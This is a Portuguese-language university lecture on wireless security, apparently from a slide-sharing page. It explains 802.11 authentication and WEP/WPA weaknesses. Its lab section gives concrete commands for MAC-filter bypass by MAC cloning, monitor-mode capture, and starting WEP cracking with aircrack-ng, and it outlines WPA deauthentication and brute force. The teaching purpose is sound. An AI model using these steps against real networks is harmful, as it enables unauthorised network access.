4 - Redes de Computadores - arp-vlan-equipsAndre Peres
 
2 - Redes de Comutadores - acesso meio
2 - Redes de Comutadores -  acesso meio2 - Redes de Comutadores -  acesso meio
2 - Redes de Comutadores - acesso meioAndre Peres
 

Mehr von Andre Peres (20)

04 - Redes sem Fios -fisico
04 - Redes sem Fios -fisico04 - Redes sem Fios -fisico
04 - Redes sem Fios -fisico
 
05 - Redes sem Fios - enlace
05 - Redes sem Fios - enlace05 - Redes sem Fios - enlace
05 - Redes sem Fios - enlace
 
03- Redes sem Fios - antenas
03- Redes sem Fios -  antenas03- Redes sem Fios -  antenas
03- Redes sem Fios - antenas
 
01 - Redes sem Fios - introducao
01 - Redes sem Fios -  introducao01 - Redes sem Fios -  introducao
01 - Redes sem Fios - introducao
 
02 - Redes sem Fios - microondas
02 - Redes sem Fios - microondas02 - Redes sem Fios - microondas
02 - Redes sem Fios - microondas
 
10 - segurança -snmp
10  - segurança -snmp10  - segurança -snmp
10 - segurança -snmp
 
8 - segurança - anatomia ataques
8 - segurança - anatomia ataques8 - segurança - anatomia ataques
8 - segurança - anatomia ataques
 
9 - segurança - ataques buffer-injection
9 - segurança -  ataques buffer-injection9 - segurança -  ataques buffer-injection
9 - segurança - ataques buffer-injection
 
7 - segurança - dmz vpn
7  - segurança -  dmz vpn7  - segurança -  dmz vpn
7 - segurança - dmz vpn
 
6 - segurança - criptografia
6   - segurança - criptografia6   - segurança - criptografia
6 - segurança - criptografia
 
5 - segurança - firewall
5  - segurança - firewall5  - segurança - firewall
5 - segurança - firewall
 
4 - segurança - mecanismos
4 - segurança - mecanismos4 - segurança - mecanismos
4 - segurança - mecanismos
 
3 - segurança - psi
3 - segurança - psi3 - segurança - psi
3 - segurança - psi
 
2 - segurança - analise de-riscos
2 - segurança - analise de-riscos2 - segurança - analise de-riscos
2 - segurança - analise de-riscos
 
1 - Segurança - introducao
1 - Segurança - introducao1 - Segurança - introducao
1 - Segurança - introducao
 
7 - Redes de Computadores - codificacao sinalizacao-multiplexacao
7 - Redes de Computadores - codificacao sinalizacao-multiplexacao7 - Redes de Computadores - codificacao sinalizacao-multiplexacao
7 - Redes de Computadores - codificacao sinalizacao-multiplexacao
 
6 - Redes de Computadores - meios transmissao
6 - Redes de Computadores - meios transmissao6 - Redes de Computadores - meios transmissao
6 - Redes de Computadores - meios transmissao
 
5 - Redes de Computadores - fr-atm-mpls
5 - Redes de Computadores - fr-atm-mpls 5 - Redes de Computadores - fr-atm-mpls
5 - Redes de Computadores - fr-atm-mpls
 
4 - Redes de Computadores - arp-vlan-equips
4 - Redes de Computadores - arp-vlan-equips4 - Redes de Computadores - arp-vlan-equips
4 - Redes de Computadores - arp-vlan-equips
 
2 - Redes de Comutadores - acesso meio
2 - Redes de Comutadores -  acesso meio2 - Redes de Comutadores -  acesso meio
2 - Redes de Comutadores - acesso meio
 

Kürzlich hochgeladen

PROJETO DE EXTENSÃO I - SERVIÇOS JURÍDICOS, CARTORÁRIOS E NOTARIAIS.pdf
PROJETO DE EXTENSÃO I - SERVIÇOS JURÍDICOS, CARTORÁRIOS E NOTARIAIS.pdfPROJETO DE EXTENSÃO I - SERVIÇOS JURÍDICOS, CARTORÁRIOS E NOTARIAIS.pdf
PROJETO DE EXTENSÃO I - SERVIÇOS JURÍDICOS, CARTORÁRIOS E NOTARIAIS.pdfHELENO FAVACHO
 
migração e trabalho 2º ano.pptx fenomenos
migração e trabalho 2º ano.pptx fenomenosmigração e trabalho 2º ano.pptx fenomenos
migração e trabalho 2º ano.pptx fenomenosLucianoPrado15
 
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdfApresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdfcomercial400681
 
Reta Final - CNU - Gestão Governamental - Prof. Stefan Fantini.pdf
Reta Final - CNU - Gestão Governamental - Prof. Stefan Fantini.pdfReta Final - CNU - Gestão Governamental - Prof. Stefan Fantini.pdf
Reta Final - CNU - Gestão Governamental - Prof. Stefan Fantini.pdfWagnerCamposCEA
 
COMPETÊNCIA 2 da redação do enem prodção textual professora vanessa cavalcante
COMPETÊNCIA 2 da redação do enem prodção textual professora vanessa cavalcanteCOMPETÊNCIA 2 da redação do enem prodção textual professora vanessa cavalcante
COMPETÊNCIA 2 da redação do enem prodção textual professora vanessa cavalcanteVanessaCavalcante37
 
ENSINO RELIGIOSO 7º ANO INOVE NA ESCOLA.pdf
ENSINO RELIGIOSO 7º ANO INOVE NA ESCOLA.pdfENSINO RELIGIOSO 7º ANO INOVE NA ESCOLA.pdf
ENSINO RELIGIOSO 7º ANO INOVE NA ESCOLA.pdfLeloIurk1
 
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdfPROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdfHELENO FAVACHO
 
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2Maria Teresa Thomaz
 
Slide - EBD ADEB 2024 Licao 02 2Trim.pptx
Slide - EBD ADEB 2024 Licao 02 2Trim.pptxSlide - EBD ADEB 2024 Licao 02 2Trim.pptx
Slide - EBD ADEB 2024 Licao 02 2Trim.pptxedelon1
 
LISTA DE EXERCICIOS envolveto grandezas e medidas e notação cientifica 1 ANO ...
LISTA DE EXERCICIOS envolveto grandezas e medidas e notação cientifica 1 ANO ...LISTA DE EXERCICIOS envolveto grandezas e medidas e notação cientifica 1 ANO ...
LISTA DE EXERCICIOS envolveto grandezas e medidas e notação cientifica 1 ANO ...Francisco Márcio Bezerra Oliveira
 
praticas experimentais 1 ano ensino médio
praticas experimentais 1 ano ensino médiopraticas experimentais 1 ano ensino médio
praticas experimentais 1 ano ensino médiorosenilrucks
 
Projeto Nós propomos! Sertã, 2024 - Chupetas Eletrónicas.pptx
Projeto Nós propomos! Sertã, 2024 - Chupetas Eletrónicas.pptxProjeto Nós propomos! Sertã, 2024 - Chupetas Eletrónicas.pptx
Projeto Nós propomos! Sertã, 2024 - Chupetas Eletrónicas.pptxIlda Bicacro
 
apostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médioapostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médiorosenilrucks
 
Análise poema país de abril (Mauel alegre)
Análise poema país de abril (Mauel alegre)Análise poema país de abril (Mauel alegre)
Análise poema país de abril (Mauel alegre)ElliotFerreira
 
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIAPROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIAHELENO FAVACHO
 
Modelo de Plano Plano semanal Educação Infantil 5 anossemanal Educação Infant...
Modelo de Plano Plano semanal Educação Infantil 5 anossemanal Educação Infant...Modelo de Plano Plano semanal Educação Infantil 5 anossemanal Educação Infant...
Modelo de Plano Plano semanal Educação Infantil 5 anossemanal Educação Infant...AndreaCavalcante14
 
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptxSlides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptxLuizHenriquedeAlmeid6
 
GEOGRAFIA - COMÉRCIO INTERNACIONAL E BLOCOS ECONÔMICOS - PROF. LUCAS QUEIROZ.pdf
GEOGRAFIA - COMÉRCIO INTERNACIONAL E BLOCOS ECONÔMICOS - PROF. LUCAS QUEIROZ.pdfGEOGRAFIA - COMÉRCIO INTERNACIONAL E BLOCOS ECONÔMICOS - PROF. LUCAS QUEIROZ.pdf
GEOGRAFIA - COMÉRCIO INTERNACIONAL E BLOCOS ECONÔMICOS - PROF. LUCAS QUEIROZ.pdfRavenaSales1
 
P P P 2024 - *CIEJA Santana / Tucuruvi*
P P P 2024  - *CIEJA Santana / Tucuruvi*P P P 2024  - *CIEJA Santana / Tucuruvi*
P P P 2024 - *CIEJA Santana / Tucuruvi*Viviane Moreiras
 
19- Pedagogia (60 mapas mentais) - Amostra.pdf
19- Pedagogia (60 mapas mentais) - Amostra.pdf19- Pedagogia (60 mapas mentais) - Amostra.pdf
19- Pedagogia (60 mapas mentais) - Amostra.pdfmarlene54545
 

Kürzlich hochgeladen (20)

PROJETO DE EXTENSÃO I - SERVIÇOS JURÍDICOS, CARTORÁRIOS E NOTARIAIS.pdf
PROJETO DE EXTENSÃO I - SERVIÇOS JURÍDICOS, CARTORÁRIOS E NOTARIAIS.pdfPROJETO DE EXTENSÃO I - SERVIÇOS JURÍDICOS, CARTORÁRIOS E NOTARIAIS.pdf
PROJETO DE EXTENSÃO I - SERVIÇOS JURÍDICOS, CARTORÁRIOS E NOTARIAIS.pdf
 
migração e trabalho 2º ano.pptx fenomenos
migração e trabalho 2º ano.pptx fenomenosmigração e trabalho 2º ano.pptx fenomenos
migração e trabalho 2º ano.pptx fenomenos
 
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdfApresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
Apresentação ISBET Jovem Aprendiz e Estágio 2023.pdf
 
Reta Final - CNU - Gestão Governamental - Prof. Stefan Fantini.pdf
Reta Final - CNU - Gestão Governamental - Prof. Stefan Fantini.pdfReta Final - CNU - Gestão Governamental - Prof. Stefan Fantini.pdf
Reta Final - CNU - Gestão Governamental - Prof. Stefan Fantini.pdf
 
COMPETÊNCIA 2 da redação do enem prodção textual professora vanessa cavalcante
COMPETÊNCIA 2 da redação do enem prodção textual professora vanessa cavalcanteCOMPETÊNCIA 2 da redação do enem prodção textual professora vanessa cavalcante
COMPETÊNCIA 2 da redação do enem prodção textual professora vanessa cavalcante
 
ENSINO RELIGIOSO 7º ANO INOVE NA ESCOLA.pdf
ENSINO RELIGIOSO 7º ANO INOVE NA ESCOLA.pdfENSINO RELIGIOSO 7º ANO INOVE NA ESCOLA.pdf
ENSINO RELIGIOSO 7º ANO INOVE NA ESCOLA.pdf
 
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdfPROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
PROJETO DE EXTENSÃO - EDUCAÇÃO FÍSICA BACHARELADO.pdf
 
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2Estudar, para quê?  Ciência, para quê? Parte 1 e Parte 2
Estudar, para quê? Ciência, para quê? Parte 1 e Parte 2
 
Slide - EBD ADEB 2024 Licao 02 2Trim.pptx
Slide - EBD ADEB 2024 Licao 02 2Trim.pptxSlide - EBD ADEB 2024 Licao 02 2Trim.pptx
Slide - EBD ADEB 2024 Licao 02 2Trim.pptx
 
LISTA DE EXERCICIOS envolveto grandezas e medidas e notação cientifica 1 ANO ...
LISTA DE EXERCICIOS envolveto grandezas e medidas e notação cientifica 1 ANO ...LISTA DE EXERCICIOS envolveto grandezas e medidas e notação cientifica 1 ANO ...
LISTA DE EXERCICIOS envolveto grandezas e medidas e notação cientifica 1 ANO ...
 
praticas experimentais 1 ano ensino médio
praticas experimentais 1 ano ensino médiopraticas experimentais 1 ano ensino médio
praticas experimentais 1 ano ensino médio
 
Projeto Nós propomos! Sertã, 2024 - Chupetas Eletrónicas.pptx
Projeto Nós propomos! Sertã, 2024 - Chupetas Eletrónicas.pptxProjeto Nós propomos! Sertã, 2024 - Chupetas Eletrónicas.pptx
Projeto Nós propomos! Sertã, 2024 - Chupetas Eletrónicas.pptx
 
apostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médioapostila projeto de vida 2 ano ensino médio
apostila projeto de vida 2 ano ensino médio
 
Análise poema país de abril (Mauel alegre)
Análise poema país de abril (Mauel alegre)Análise poema país de abril (Mauel alegre)
Análise poema país de abril (Mauel alegre)
 
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIAPROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
PROJETO DE EXTENSÃO I - AGRONOMIA.pdf AGRONOMIAAGRONOMIA
 
Modelo de Plano Plano semanal Educação Infantil 5 anossemanal Educação Infant...
Modelo de Plano Plano semanal Educação Infantil 5 anossemanal Educação Infant...Modelo de Plano Plano semanal Educação Infantil 5 anossemanal Educação Infant...
Modelo de Plano Plano semanal Educação Infantil 5 anossemanal Educação Infant...
 
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptxSlides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
Slides Lição 05, Central Gospel, A Grande Tribulação, 1Tr24.pptx
 
GEOGRAFIA - COMÉRCIO INTERNACIONAL E BLOCOS ECONÔMICOS - PROF. LUCAS QUEIROZ.pdf
GEOGRAFIA - COMÉRCIO INTERNACIONAL E BLOCOS ECONÔMICOS - PROF. LUCAS QUEIROZ.pdfGEOGRAFIA - COMÉRCIO INTERNACIONAL E BLOCOS ECONÔMICOS - PROF. LUCAS QUEIROZ.pdf
GEOGRAFIA - COMÉRCIO INTERNACIONAL E BLOCOS ECONÔMICOS - PROF. LUCAS QUEIROZ.pdf
 
P P P 2024 - *CIEJA Santana / Tucuruvi*
P P P 2024  - *CIEJA Santana / Tucuruvi*P P P 2024  - *CIEJA Santana / Tucuruvi*
P P P 2024 - *CIEJA Santana / Tucuruvi*
 
19- Pedagogia (60 mapas mentais) - Amostra.pdf
19- Pedagogia (60 mapas mentais) - Amostra.pdf19- Pedagogia (60 mapas mentais) - Amostra.pdf
19- Pedagogia (60 mapas mentais) - Amostra.pdf
 

Ataque Redes Wireless - Prática de Ataques

  • 1. Tecnologia em Redes de Computadores Gerência de Redes Prática de Ataques - wireless Professor: André Peres andre.peres@poa.ifrs.edu.br Instituto Federal do Rio Grande do Sul - IFRS Porto Alegre
  • 2. Enlace IEEE 802.11 Existem 3 tipos de enlace IBSS (Independent Basic Service Set) = ad-hoc BSS (Basic Service Set) ESS (Extended Service Set)
  • 3. Enlace IEEE 802.11 IBSS ou ad-hoc Criada de maneira espontânea Área de abrangência pequena Sem controle centralizado
  • 4. Enlace IEEE 802.11 BSS Controle centralizado (AP – Access Point) • Concentrador (hub) para rede sem fios • Comutador (switch) entre enlaces com/sem fio • Área de abrangência definida pelo AP
  • 5. Enlace IEEE 802.11 ESS Múltiplos BSSs APs se comunicam via DS (distributed system) Objetivo: roaming
  • 6. Enlace IEEE 802.11 Ligação entre redes: Pode utilizar BSS ou IBSS Com BSS • Um AP • Dois APs (um é configurado como cliente)
  • 7. Enlace IEEE 802.11 Nível de enlace IEEE 802.11 Controle de comunicação de nível físico Baseado no padrão IEEE 802.3 (ethernet) Utiliza endereços MAC compatíveis com ethernet Controle de acesso ao meio: CSMA/CA Controle de erros tipo stop-and-wait
  • 8. Enlace IEEE 802.11 Para conexão de uma estação com a rede Deve respeitar uma máquina de estados:
  • 9. Enlace IEEE 802.11 Para conexão de uma estação com a rede Configuração da placa cliente • Tipo de rede (BSSType) – Ad-hoc – Infra estrutura (BSS) – Qualquer • Nome da rede (SSID) – Uma rede específica – Qualquer rede
  • 10. Enlace IEEE 802.11 Para conexão de uma estação com a rede Configuração da placa cliente • Tipo de descoberta da rede (scan type) – Passivo → aguarda beacon frames – Ativo → utiliza probe request • Canal a ser utilizado (channel) – Especifica um canal 1 → 11 – Qualquer canal (faz varredura de todos em busca da rede)
  • 11. Enlace IEEE 802.11 Para conexão de uma estação com a rede A estação deve “encontrar” a rede • O AP divulga sua existência através de beacon frames
  • 12. Enlace IEEE 802.11 Para conexão de uma estação com a rede • Por segurança o AP pode não divulgar o nome da rede, obrigando a estação a utilizar probe request
  • 13. Enlace IEEE 802.11 Para conexão de uma estação com a rede • O AP responde ao Probe Request com um Probe Response:
  • 14. Enlace IEEE 802.11 Para conexão de uma estação com a rede Após a identificação do SSID e troca de mensagens iniciais • Estado 1 → Não autenticado, Não associado Passa-se para a fase de autenticação • Padrão inicial: – Open System – Shared Key (WEP) • Adicionados Posteriormente: – PSK - Pre-Shared Key (WPA, WPA2) – 802.1x (WEP, WPA, WPA2)
  • 15. Enlace IEEE 802.11 Autenticação Open System Autenticação nula Qualquer estação é autenticada por padrão Protocolo: 1 → Estação envia uma requisição de autenticação 2 → AP aceita a autenticação (sempre successfull)
  • 16. Enlace IEEE 802.11 Autenticação Shared Key Utiliza WEP com texto desafio • O WEP utiliza criptografia simétrica (chave única)
  • 17. Enlace IEEE 802.11 Autenticação Pre-Shared Key Similar ao Shared Key A chave é utilizada apenas na autenticação Autenticação 802.1x Necessita de um servidor RADIUS O AP serve como um NAS (Network Access Server) A comunicação ocorre entre cliente e servidor RADIUS O servidor RADIUS informa ao AP o resultado da autenticação
  • 18. Enlace IEEE 802.11 Para conexão de uma estação com a rede Após a autenticação • Estado 2 → Autenticado, Não associado Fase de associação • Passagem automática do estado 2 → 3 • Estado 3 → Autenticado, Associado • Agora a estação pode receber/transmitir quadros de enlace na rede • Acesso ao servidor DHCP, etc...
  • 19. Segurança IEEE 802.11 A autenticação faz parte do processo de segurança Após a autenticação, a estação passa para o estado de autenticado/associado Somente neste estado, a estação pode trocar quadros de enlace com a rede
  • 20. Segurança IEEE 802.11 Criptografia WEP (Wired Equivalent Privacy) • Baseia-se na dificuldade do atacante em obter um segredo compartilhado entre as estações • Utiliza criptografia simétrica – Mesma chave para cifragem e decifragem de quadros • Baseado no algoritmo RC4 – Não é uma implementação pura do RC4 – Foram feitas modificações...
  • 23. Segurança IEEE 802.11 WEP Criptografia simétrica utilizando operações XOR Necessita de uma chave com o mesmo tamanho da mensagem (inviável) Para contornar este problema utiliza o gerador de números pseudo-aleatórios (PRNG) do RC4 Funcionamento: utiliza uma SEMENTE secreta para gerar a chave de cifragem do mesmo tamanho da mensagem
  • 24. Segurança IEEE 802.11 WEP A chave não pode ser reaproveitada em dois quadros MSG [XOR] CIF → CHAVE Se atacante insere ou conhece a mensagem original e captura mensagem cifrada, obtém a chave utilizada
  • 25. Segurança IEEE 802.11 WEP Utilização de chave única → problema de sincronismo !
  • 26. Segurança IEEE 802.11 WEP Necessária chave única, para cada quadro de enlace Quadros de até 3000 bytes a 54 Mbps = muitas chaves diferentes por segundo Uma semente gera uma chave... A mesma semente deve ser utilizada por todas as estações
  • 27. Segurança IEEE 802.11 WEP Solução → utilização de um vetor de inicialização em conjunto com a semente IV (Initialization Vector) → 24 bits randômicos • Deve ser divulgado para a estação que irá decifrar o quadro
  • 30. Segurança IEEE 802.11 WEP O segredo permanece o mesmo, enquanto o IV é alterado a cada quadro de enlace IV → 24 bits Segredo → 5 bytes → 40 bits = WEP64 Segredo → 13 bytes → 104 bits = WEP128
  • 31. Segurança IEEE 802.11 Problemas do WEP Utilização de chaves repetidas IV → 24 bits → 224 combinações Quadros de 1500 bytes a 11 Mbps (1500 x 8 x 224) / (11 x 106)= 1800 segundos Aproximadamente 5 horas Excluindo possibilidade de 2 máquinas utilizarem o mesmo IV.... .... ...
  • 32. Segurança IEEE 802.11 Problemas do WEP Os bits permanecem na mesma posição do quadro... • Se atacante deseja alterar um bit, basta inverter o seu valor • Além disso, deve identificar a alteração no CRC32 Se atacante captura uma chave, já pode gerar pacotes falsos na rede utilizando esta chave/IV
  • 33. Segurança IEEE 802.11 Problemas do WEP Pesquisa de Fluhrer, Mantin, Shamir “Weaknesses in the key scheduling Algorithm of RC4” Possíveis chaves fracas no PRNG do RC4 Ao utilizar uma chave fraca, identifica bits da semente O WEP utiliza muitas sementes diferentes, gerando muitas chaves fracas
  • 34. Segurança IEEE 802.11 Problemas do WEP Programas WEPCrack e AirSnort Total de pacotes: 2,5 milhões Pacotes “interessantes”: 1878 Segredo: xC513
  • 35. Segurança IEEE 802.11 Problemas do WEP Programas WEPCrack e AirSnort Total de pacotes: 7,3 milhões Pacotes “interessantes”: 4160 Segredo: xCd513ewq1pkm
  • 36. Segurança IEEE 802.11 Problemas do WEP Análise dos bits iniciais de uma mensagem cifrada • O LLC inclui sempre os mesmos bits: 0xaa Inferir através de análise probabilística os bits da semente (os primeiros bits são o IV) Isto facilita a descoberta dos demais bits da semente (segredo compartilhado)
  • 37. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) Após descoberta das vulnerabilidades WEP Criado grupo de trabalho IEEE 802.11i • Responsável pelo novo protocolo de segurança 802.11 • Reuniões entre fabricantes e comunidade científica Fornecedores preocupados • Demora com 802.11i • Criada Wi-Fi Alliance • Necessidade de compatibilidade com hardware antigo • Apenas atualização de firmware
  • 38. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) Para manter o hardware → novo esquema rodando sobre protocolo antigo (WEP) Protocolo WPA (ano: 2002) • Mantém o WEP • Contém mecanismo de troca de segredo (parte da semente além do IV) periodicamente → TKIP (Temporal Key Integrity Protocol) • Permite autenticação via PSK ou 802.1x
  • 39. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) MICHAEL • Substitui o CRC32 para verificação de integridade de mensagens • Gera um cálculo de 64 bits • Serve para impedir que um atacante consiga inserir quadros em uma rede cifrada
  • 40. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) TKIP • Troca dinâmica de segredo • Necessita de um novo mecanismo de autenticação • Como o segredo é trocado, não pode utilizar a chave dinâmica como autenticação (o cliente não conhece a chave) PSK (Pre-Shared Key) • Chave “mestra” utilizada no processo de autenticação • Utilizada inicialmente para ingresso na rede • Após autenticação, estação recebe a chave que está sendo utilizada pelas demais estações na rede
  • 41. Segurança IEEE 802.11 WPA (Wi-fi Protected Access) PSK (Pre-Shared Key) • É o ponto pelo qual um atacante tenta obter acesso à rede • Atacante captura processo de autenticação e tenta identificar a PSK utilizada neste processo • Ao obter a PSK, consegue entrar na rede • Como o número de quadros trocados na autenticação é pequeno, o ataque deve ser baseado em força bruta • Força bruta → dicionário de senhas + software de análise da autenticação WPA
  • 42. Segurança IEEE 802.11 WPA + 802.1x • Alternativa ao PSK • Não possui chave inicial • Usuário deve se autenticar com servidor RADIUS – PEAP (usuário/senha) – Certificado – … • Necessário servidor RADIUS • AP serve como ponte entre estação e RADIUS
  • 43. Segurança IEEE 802.11 802.1x • Baseado no conceito de “portas” – Enquanto a estação não finaliza o processo de autenticação fica com a “porta” para a rede fechada – A única comunicação permitida é com o servidor RADIUS – Apenas no final da autenticação com sucesso (indicada pelo servidor RADIUS para o AP) o AP libera o acesso • Processo de autenticação ocorre no nível de enlace
  • 54. Segurança IEEE 802.11 802.1x • No caso de uso de certificados, apenas quem possui certificado válido (CA) pode acessar a rede • No caso de EAP, verificado usuário/senha – Possibilidade de força bruta • O AP é autenticado junto ao RADIUS, impedindo AP falso • Possibilidade de ataques com AP+RADIUS falsos – Atacante realiza a autenticação do cliente – Não funciona com TLS (autenticação mútua AP ↔ Estação) via certificados
  • 55. Segurança IEEE 802.11 WPA2 (IEEE 802.11i) Ano: 2004 Substituição total do protocolo criptográfico Utilização do AES(Advanced Encryption Standard) • Robusto • Sem ataques à criptografia conhecidos • Padrão de criptografia adotado por diversos softwares/equipamentos Incompatível com equipamentos anteriores Autenticação via PSK e 802.1x, Criptografia AES
  • 56. Segurança IEEE 802.11 Na prática WEP → fora ! Usuário doméstico/SOHO: • Equipamentos antigos ( → 2004): WPA/PSK • Equipamentos novos (2004 → ): WPA2/PSK Usuário empresarial: • Equipamentos antigos ( → 2004) : WPA/802.1x • Equipamentos novos (2004 → ) : WPA2/802.1x
  • 57. Ataques Visão do atacante: 1. criptografia nenhuma WEP WPA WPA-2
  • 58. Ataques Visão do atacante: 2. autenticação nenhuma shared-key PSK 802.1x
  • 59. Ataques Visão do atacante: 3. mecanismos adicionais nenhum Filtro MAC SSID escondido Mecanismos layer 3 (firewall, etc...)
  • 60. Ataques Cenários de testes: 1 – AP com SSID escondido e filtro de MAC Ataque: captura de probes + clonagem de MAC 2 – WEP Ataque: quebra do WEP via software 3 – WPA Ataque: desconexão de um cliente + captura de autenticação + força bruta
  • 61. Ataques 1 – AP com SSID escondido e filtro de MAC Ataque: captura de probes + clonagem de MAC Passos: Descoberta do SSID: - colocar a placa de redes sem fios em modo monitor - capturar tráfego via wireshark, tcpdump, etc....
  • 62. Ataques 1 – AP com SSID escondido e filtro de MAC Configurando o AP
  • 63. Ataques 1 – AP com SSID escondido e filtro de MAC Obtendo o nome da rede: # ip l s wlan0 down # iwconfig wlan0 mode monitor # iwconfig wlan0 channel 8 # ip l s wlan0 up Executar o wireshark e aguardar os “probes”
  • 64. Ataques 1 – AP com SSID escondido e filtro de MAC Obtendo o nome da rede:
  • 65. Ataques 1 – AP com SSID escondido e filtro de MAC Buscar por pacotes de probe (OK) Buscar pelo MAC address de uma estação que está navegando Identificar faixa de endereços IP utilizados e buscar por um IP que não está sendo usado Objetivo: Mesmo MAC, IP diferente....
  • 66. Ataques 1 – AP com SSID escondido e filtro de MAC Configurando o AP
  • 67. Ataques 1 – AP com SSID escondido e filtro de MAC Obtendo o MAC de uma estação da rede: - placa em modo monitor - wireshark...
  • 68. Ataques 1 – AP com SSID escondido e filtro de MAC Obtendo o MAC de uma estação da rede:
  • 69. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC: Atacante Alvo ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico
  • 70. Ataques 1 – AP com SSID escondido e filtro de MAC Alvo envia um quadro Clonagem de MAC: AP verifica MAC origem Atacante Alvo OK ! ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D OK ! 11:11 AA:AA 10.1.1.2 200.1.1.1
  • 71. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC: Atacante Alvo Volta a resposta ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 72. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC: As duas placas de Atacante Alvo rede aceitam... e repassam para o IP ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 73. Ataques IP destino = 10.1.1.1? 1 – AP com SSID escondido e filtro de MAC NÃO ! Eu sou um roteador? Clonagem de MAC: NÃO ! Atacante Alvo → descarta o pacote !!! ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 74. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC: Ou seja... Duas máquinas com mesmo MAC e IP's diferentes podem “navegar” simultaneamente (layer3) … afinal é possível ter uma máquina com mais de um IP vinculado na mesma placa de rede....
  • 75. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC e associação com AP: # killall nm-applet # ip l s wlan0 down # ip l s wlan0 address 00:1b:77:b9:51:49 # ip a a 10.1.0.200/24 dev wlan0 # ip l s wlan0 up # iwconfig wlan0 essid sectest ap 00:1c:f0:63:a8:7e channel 8 # tail -f /var/log/syslog --------------------------------- kernel: [ 225.723137] wlan0: waiting for beacon from 00:1c:f0:63:a8:7e kernel: [ 225.757365] wlan0: beacon received kernel: [ 225.783319] wlan0: associate with 00:1c:f0:63:a8:7e (try 1) kernel: [ 225.785939] wlan0: RX AssocResp from 00:1c:f0:63:a8:7e (capab=0x401 status=0 aid=1) kernel: [ 225.785943] wlan0: associated
  • 76. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC e associação com AP: - não utilizar o serviço de DHCP... - configurar na mão: → roteador default → servidor de DNS
  • 77. Ataques 1 – AP com SSID escondido e filtro de MAC Clonagem de MAC e associação com AP:
  • 78. Ataques 2 – Quebra de WEP via software Vulnerabilidade – PRNG do RC4 gerando chaves fracas... Técnica: 1. captura de pacotes cifrados com diferentes IVs 2. análise dos pacotes (software) para obtenção do segredo compartilhado
  • 79. Ataques 2 – Quebra de WEP via software Passos: 1. colocar a placa de rede em modo monitor para captura do tráfego cifrado: # ip l s wlan0 down # iwconfig wlan0 mode monitor # iwconfig wlan0 channel 8 # ip l s wlan0 up
  • 80. Ataques 2 – Quebra de WEP via software Passos: 2. instalação do software aircrack-ng # apt-get install aircrack-ng 3. captura do tráfego (descoberta das redes) # airodump-ng wlan0
